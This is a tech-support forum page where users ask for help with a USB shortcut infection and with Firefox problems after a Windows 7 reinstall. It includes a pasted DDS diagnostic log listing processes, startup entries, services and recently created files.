Channel: Tech Support Forum - Virus/Trojan/Spyware Help

Pendrive having shortcut

Hi everyone,

I have a problem with my laptop: whenever I insert a pendrive in my lappy, it creates a shortcut of that USB and the files don't open.
If I open the shortcut and then put my file in it, the file opens. It is affecting my lappy as well as others'. Some of my friends' laptops have been affected because of this issue and some pendrives have stopped working. It gets write-protected and also gets a .dll error.
Please suggest something as soon as possible. I would be grateful to you people.

glitches after reinstall

Hi,

I really don't think I have malware; however, from my thread "some glitches after restored win7" (http://www.techsupportforum.com/foru...7-1014026.html), spunk.funk thinks it may be malware.

Right now the biggest problem is with FF: making the tabs the same when I try to open a new one or change one, clicking on links in email or forum doesn't work, and loss of icon on taskbar in general account only. I've uninstalled and reinstalled FF 4 times since the reinstall of the OS (the first one I had a BSOD in the middle of updating Windows and had many, many problems, so did a full reinstall) and ran anti-malware programs both before and after the reinstalls (MSSE, Malwarebytes, and ESET online scanner) and none found any problems. I didn't load the 3 PUPs Windows updates when updating Windows, although before the reinstall and before I knew the Windows 7 updates were PUPs for Win10 I had them downloaded and installed.

One other program isn't showing up in my general account. Also, a few desktop icons I can't seem to get rid of that have to do with my Canon printer.

Since the BSOD in the first try to reinstall had to do with hardware, I've loaded the drivers for my other USB hardware but removed them, so only my mouse and keyboard are plugged in.

I have the factory disc (which I used for the reinstalls) and the windows disc for my computer.

Thank you

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by 93 at 14:16:49 on 2015-07-05
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.7104.5233 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Program Files\Sandboxie\SbieSvc.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files\Microsoft LifeCam\MSCamS64.exe
C:\Windows\system32\svchost.exe -k imgsvc
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Users\93\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files\Sandboxie\SbieCtrl.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\splwow64.exe
C:\Program Files (x86)\Canon\Quick Menu\CNQMUPDT.EXE
C:\Program Files (x86)\Canon\Quick Menu\CNQMSWCS.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\PrintIsolationHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.pugetsystems.com/welcome.php?oid=117561
mWinlogon: Userinit = userinit.exe
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [f.lux] "C:\Users\93\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRun: [SandboxieControl] "C:\Program Files\Sandboxie\SbieCtrl.exe"
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe -expressboot
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [LifeCam] "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
TCP: NameServer = 192.168.0.1 205.171.3.25
TCP: Interfaces\{649FED28-E5CC-41A3-A3E0-B1852BA10A06} : DHCPNameServer = 192.168.0.1 205.171.3.25
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.130\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [IAStorIcon] "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
x64-Run: [IgfxTray] "C:\Windows\System32\igfxtray.exe"
x64-Run: [HotKeysCmds] "C:\Windows\System32\hkcmd.exe"
x64-Run: [Persistence] "C:\Windows\System32\igfxpers.exe"
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\93\AppData\Roaming\Mozilla\Firefox\Profiles\syowip1a.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.pugetsystems.com/welcome.php?oid=117561
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll
FF - plugin: C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_194.dll
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-1-31 652784]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-1-31 28656]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-11-21 20464]
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-5-29 77128]
R2 asComSvc;ASUS Com Service;C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [2013-11-21 927232]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-1-31 15344]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2013-2-13 731648]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-11-21 169432]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-6-18 124568]
R3 e1dexpress;Intel(R) PRO/1000 PCI Express Network Connection Driver D;C:\Windows\System32\drivers\e1d62x64.sys [2013-11-21 496400]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-11-21 452088]
R3 iusb3hub;Intel(R) USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-11-21 368112]
R3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-11-21 786416]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2013-11-21 25816]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
R3 SbieDrv;SbieDrv;C:\Program Files\Sandboxie\SbieDrv.sys [2015-6-23 190088]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-7-4 1133880]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-3 327296]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-7-4 114688]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2013-2-13 820184]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-7-4 63704]
S3 MSHUSBVideo;NX6000/NX3000/VX2000/VX5000/VX5500/VX7000/Cinema Filter Driver;C:\Windows\System32\drivers\nx6000.sys [2010-5-20 36720]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-11-21 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-7-5 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2013-11-21 30208]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2013-11-21 1255736]
.
=============== Created Last 30 ================
.
2015-07-05 21:05:39 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B8CDF2AE-9704-4AC7-A361-33BB8383E557}\offreg.936.dll
2015-07-05 14:58:35 -------- d-----r- C:\Sandbox
2015-07-05 14:53:41 12221144 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B8CDF2AE-9704-4AC7-A361-33BB8383E557}\mpengine.dll
2015-07-05 13:55:51 12221144 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-07-05 13:11:54 -------- d-----w- C:\Program Files (x86)\ESET
2015-07-05 13:08:09 -------- d-----w- C:\Windows\pss
2015-07-05 12:53:06 -------- d-----w- C:\Users\93\AppData\Roaming\WinPatrol
2015-07-05 12:53:01 -------- d-----w- C:\ProgramData\InstallMate
2015-07-05 12:53:01 -------- d-----w- C:\Program Files (x86)\Ruiware
2015-07-05 12:47:28 -------- d-----w- C:\Program Files\iTunes
2015-07-05 12:47:28 -------- d-----w- C:\Program Files\iPod
2015-07-05 12:47:28 -------- d-----w- C:\Program Files (x86)\iTunes
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin5.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin4.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin3.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin2.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin.dll
2015-07-05 12:20:59 -------- d-----w- C:\Users\93\AppData\Local\Macromedia
2015-07-05 12:19:17 -------- d-----w- C:\Users\93\AppData\Roaming\Canneverbe Limited
2015-07-05 12:09:38 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-05 12:09:38 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-05 12:01:58 336896 ----a-w- C:\Windows\SysWow64\CNC_C9L.dll
2015-07-05 12:01:58 15872 ----a-w- C:\Windows\SysWow64\CNHMCA.dll
2015-07-05 11:59:58 -------- d-----w- C:\ProgramData\CanonIJWSpt
2015-07-05 11:56:22 -------- d-----w- C:\Program Files\Canon
2015-07-05 11:55:41 30208 ----a-w- C:\Windows\System32\Spool\prtprocs\x64\CNMPDC9.DLL
2015-07-05 11:55:41 102912 ----a-w- C:\Windows\System32\Spool\prtprocs\x64\CNMPPC9.DLL
2015-07-05 11:55:39 369664 ----a-w- C:\Windows\System32\CNC_C9L.dll
2015-07-05 11:55:39 316928 ----a-w- C:\Windows\System32\CNC_C9C.dll
2015-07-05 11:55:39 17920 ----a-w- C:\Windows\System32\CNHMCA6.dll
2015-07-05 11:55:39 105984 ----a-w- C:\Windows\System32\CNC_C9I.dll
2015-07-05 11:55:35 406016 ----a-w- C:\Windows\System32\CNMLMC9.DLL
2015-07-05 11:30:34 -------- d-----w- C:\Users\93\AppData\Roaming\Canon_Inc_IC
2015-07-05 11:30:00 -------- d-----w- C:\Program Files (x86)\Canon
2015-07-05 11:29:57 -------- d-----w- C:\Program Files (x86)\Common Files\Canon_Inc_IC
2015-07-05 11:28:38 -------- d-----w- C:\ProgramData\Canon_Inc_IC
2015-07-05 11:23:42 -------- d-----w- C:\Temp
2015-07-05 08:46:41 6584320 ----a-w- C:\Windows\System32\mstscax.dll
2015-07-05 08:45:58 2565120 ----a-w- C:\Windows\System32\d3d10warp.dll
2015-07-05 08:45:58 1987584 ----a-w- C:\Windows\SysWow64\d3d10warp.dll
2015-07-05 08:45:57 3179520 ----a-w- C:\Windows\System32\rdpcorets.dll
2015-07-05 08:45:57 243200 ----a-w- C:\Windows\System32\rdpudd.dll
2015-07-05 08:45:57 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2015-07-05 08:45:42 460800 ----a-w- C:\Windows\System32\certcli.dll
2015-07-05 08:45:42 342016 ----a-w- C:\Windows\SysWow64\certcli.dll
2015-07-05 08:45:22 1647104 ----a-w- C:\Windows\System32\DWrite.dll
2015-07-05 08:45:22 1250816 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-07-05 08:45:22 1179136 ----a-w- C:\Windows\System32\FntCache.dll
2015-07-05 08:45:17 683520 ----a-w- C:\Windows\System32\termsrv.dll
2015-07-05 08:43:02 52224 ----a-w- C:\Windows\SysWow64\nlaapi.dll
2015-07-05 08:43:02 303616 ----a-w- C:\Windows\System32\nlasvc.dll
2015-07-05 08:43:02 156672 ----a-w- C:\Windows\SysWow64\ncsi.dll
2015-07-05 08:43:00 335360 ----a-w- C:\Windows\System32\msieftp.dll
2015-07-05 08:43:00 301568 ----a-w- C:\Windows\SysWow64\msieftp.dll
2015-07-05 08:42:58 210432 ----a-w- C:\Windows\System32\profsvc.dll
2015-07-05 08:42:56 484864 ----a-w- C:\Windows\System32\wer.dll
2015-07-05 08:42:56 381440 ----a-w- C:\Windows\SysWow64\wer.dll
2015-07-05 08:42:54 141312 ----a-w- C:\Windows\System32\drivers\mrxdav.sys
2015-07-05 08:27:44 -------- d-s---w- C:\Windows\SysWow64\GWX
2015-07-05 08:27:44 -------- d-s---w- C:\Windows\System32\GWX
2015-07-05 08:27:44 -------- d-----w- C:\Windows\Migration
2015-07-05 08:17:05 2777088 ----a-w- C:\Windows\System32\msmpeg2vdec.dll
2015-07-05 08:17:05 2285056 ----a-w- C:\Windows\SysWow64\msmpeg2vdec.dll
2015-07-05 07:35:58 81408 ----a-w- C:\Windows\System32\imagehlp.dll
2015-07-05 07:35:58 159232 ----a-w- C:\Windows\SysWow64\imagehlp.dll
2015-07-05 07:35:56 504320 ----a-w- C:\Windows\System32\msihnd.dll
2015-07-05 07:35:56 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2015-07-05 07:35:56 1941504 ----a-w- C:\Windows\System32\authui.dll
2015-07-05 07:35:56 1805824 ----a-w- C:\Windows\SysWow64\authui.dll
2015-07-05 07:35:56 112064 ----a-w- C:\Windows\System32\consent.exe
2015-07-05 07:35:45 497152 ----a-w- C:\Windows\System32\drivers\afd.sys
2015-07-05 07:35:44 624128 ----a-w- C:\Windows\System32\qedit.dll
2015-07-05 07:35:44 509440 ----a-w- C:\Windows\SysWow64\qedit.dll
2015-07-05 07:12:31 -------- d-----w- C:\Program Files\Sandboxie
2015-07-05 07:09:35 -------- d-----w- C:\Users\93\AppData\Local\FluxSoftware
2015-07-05 06:52:17 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-07-05 06:52:17 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-07-05 06:39:09 230400 ----a-w- C:\Windows\System32\drivers\portcls.sys
2015-07-05 06:39:09 116736 ----a-w- C:\Windows\System32\drivers\drmk.sys
2015-07-05 06:39:04 99840 ----a-w- C:\Windows\System32\drivers\usbccgp.sys
2015-07-05 06:39:04 7808 ----a-w- C:\Windows\System32\drivers\usbd.sys
2015-07-05 06:39:04 53248 ----a-w- C:\Windows\System32\drivers\usbehci.sys
2015-07-05 06:39:04 343040 ----a-w- C:\Windows\System32\drivers\usbhub.sys
2015-07-05 06:39:04 325120 ----a-w- C:\Windows\System32\drivers\usbport.sys
2015-07-05 06:39:04 30720 ----a-w- C:\Windows\System32\drivers\usbuhci.sys
2015-07-05 06:39:04 25600 ----a-w- C:\Windows\System32\drivers\usbohci.sys
2015-07-05 06:38:46 -------- d-----w- C:\Users\93\AppData\Roaming\Contaware
2015-07-05 06:38:46 -------- d-----w- C:\ContaCam
2015-07-05 06:38:39 -------- d-----w- C:\Program Files (x86)\ContaCam
2015-07-05 06:36:02 -------- d-----w- C:\ProgramData\Licenses
2015-07-05 06:36:01 129872 ----a-w- C:\Windows\SysWow64\MSSTDFMT.DLL
2015-07-05 06:35:59 -------- d-----w- C:\Program Files (x86)\SpywareBlaster
2015-07-05 06:28:45 -------- d-----w- C:\Users\93\AppData\Local\Skype
2015-07-05 06:27:01 -------- d-----w- C:\Program Files\Microsoft LifeCam
2015-07-05 06:27:01 -------- d-----w- C:\Program Files (x86)\Microsoft LifeCam
2015-07-05 06:08:24 -------- d-----w- C:\Program Files\Microsoft Mouse and Keyboard Center
2015-07-05 06:03:46 878080 ----a-w- C:\Windows\System32\IMJP10K.DLL
2015-07-05 06:03:46 701440 ----a-w- C:\Windows\SysWow64\IMJP10K.DLL
2015-07-05 06:03:45 3928064 ----a-w- C:\Windows\System32\d2d1.dll
2015-07-05 06:03:45 3419136 ----a-w- C:\Windows\SysWow64\d2d1.dll
2015-07-05 06:03:44 2048 ----a-w- C:\Windows\SysWow64\msxml3r.dll
2015-07-05 06:03:44 2048 ----a-w- C:\Windows\System32\msxml3r.dll
2015-07-05 06:03:44 1882624 ----a-w- C:\Windows\System32\msxml3.dll
2015-07-05 06:03:44 1237504 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-07-05 06:03:41 985536 ----a-w- C:\Windows\System32\drivers\dxgkrnl.sys
2015-07-05 06:00:13 459336 ----a-w- C:\Windows\System32\drivers\cng.sys
2015-07-05 05:59:21 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-07-05 05:51:44 861696 ----a-w- C:\Windows\System32\oleaut32.dll
2015-07-05 05:51:44 571904 ----a-w- C:\Windows\SysWow64\oleaut32.dll
2015-07-05 05:51:40 142336 ----a-w- C:\Windows\System32\poqexec.exe
2015-07-05 05:51:40 123904 ----a-w- C:\Windows\SysWow64\poqexec.exe
2015-07-05 05:49:08 241152 ----a-w- C:\Windows\System32\pku2u.dll
2015-07-05 05:49:08 186880 ----a-w- C:\Windows\SysWow64\pku2u.dll
2015-07-05 05:46:48 828928 ----a-w- C:\Windows\SysWow64\msctf.dll
2015-07-05 05:45:53 72192 ----a-w- C:\Windows\System32\aelupsvc.dll
2015-07-05 05:44:57 1684928 ----a-w- C:\Windows\System32\drivers\ntfs.sys
2015-07-05 05:44:55 406528 ----a-w- C:\Windows\System32\scesrv.dll
2015-07-05 05:44:55 308224 ----a-w- C:\Windows\SysWow64\scesrv.dll
2015-07-05 05:44:53 3241984 ----a-w- C:\Windows\System32\msi.dll
2015-07-05 05:44:53 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
2015-07-05 05:44:35 202752 ----a-w- C:\Windows\System32\scrrun.dll
2015-07-05 05:44:35 168960 ----a-w- C:\Windows\System32\wscript.exe
2015-07-05 05:44:35 163840 ----a-w- C:\Windows\SysWow64\scrrun.dll
2015-07-05 05:44:35 156160 ----a-w- C:\Windows\System32\cscript.exe
2015-07-05 05:44:35 150016 ----a-w- C:\Windows\System32\wshom.ocx
2015-07-05 05:44:35 141824 ----a-w- C:\Windows\SysWow64\wscript.exe
2015-07-05 05:44:35 126976 ----a-w- C:\Windows\SysWow64\cscript.exe
2015-07-05 05:44:35 121856 ----a-w- C:\Windows\SysWow64\wshom.ocx
2015-07-05 05:43:02 465920 ----a-w- C:\Windows\System32\WMPhoto.dll
2015-07-05 05:43:02 417792 ----a-w- C:\Windows\SysWow64\WMPhoto.dll
2015-07-05 05:43:01 664064 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2015-07-05 05:43:01 1216000 ----a-w- C:\Windows\System32\rpcrt4.dll
2015-07-05 05:21:55 -------- d-----w- C:\Windows\TempF557102D-152E-62A5-F388-7DC92BE60855-Signatures
2015-07-05 05:15:25 -------- d-----r- C:\Program Files (x86)\Skype
2015-07-05 05:11:12 99480 ----a-w- C:\Windows\SysWow64\infocardapi.dll
2015-07-05 05:11:11 8856 ----a-w- C:\Windows\SysWow64\icardres.dll
2015-07-05 05:11:11 8856 ----a-w- C:\Windows\System32\icardres.dll
2015-07-05 05:11:11 619672 ----a-w- C:\Windows\SysWow64\icardagt.exe
2015-07-05 05:11:11 171160 ----a-w- C:\Windows\System32\infocardapi.dll
2015-07-05 05:11:11 1389208 ----a-w- C:\Windows\System32\icardagt.exe
2015-07-05 05:10:59 35480 ----a-w- C:\Windows\SysWow64\TsWpfWrp.exe
2015-07-05 05:10:59 35480 ----a-w- C:\Windows\System32\TsWpfWrp.exe
2015-07-05 04:50:35 1480192 ----a-w- C:\Windows\System32\crypt32.dll
2015-07-05 04:30:30 493504 ----a-w- C:\Windows\System32\mcupdate_GenuineIntel.dll
2015-07-05 04:26:21 81560 ----a-w- C:\Windows\SysWow64\mscories.dll
2015-07-05 04:26:21 73880 ----a-w- C:\Windows\System32\mscories.dll
2015-07-05 04:26:21 1943696 ----a-w- C:\Windows\System32\dfshim.dll
2015-07-05 04:26:21 156824 ----a-w- C:\Windows\SysWow64\mscorier.dll
2015-07-05 04:26:21 156312 ----a-w- C:\Windows\System32\mscorier.dll
2015-07-05 04:26:21 1131664 ----a-w- C:\Windows\SysWow64\dfshim.dll
2015-07-05 04:24:57 82944 ----a-w- C:\Windows\System32\dwmapi.dll
2015-07-05 04:24:57 67584 ----a-w- C:\Windows\SysWow64\dwmapi.dll
2015-07-05 04:24:57 1632768 ----a-w- C:\Windows\System32\dwmcore.dll
2015-07-05 04:24:57 1372160 ----a-w- C:\Windows\SysWow64\dwmcore.dll
2015-07-05 04:18:08 965000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2015-07-05 04:18:08 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A3917C19-9C92-466A-9D63-AE4A0B6E4827}\gapaengine.dll
2015-07-05 04:09:59 -------- d-----w- C:\Windows\PCHEALTH
2015-07-05 04:06:53 -------- d-----w- C:\Program Files (x86)\Microsoft Analysis Services
2015-07-05 04:06:41 -------- d-----w- C:\Users\93\AppData\Local\Microsoft Help
2015-06-17 07:23:50 94208 ----a-w- C:\Windows\SysWow64\QuickTimeVR.qtx
2015-06-17 07:23:50 69632 ----a-w- C:\Windows\SysWow64\QuickTime.qts
.
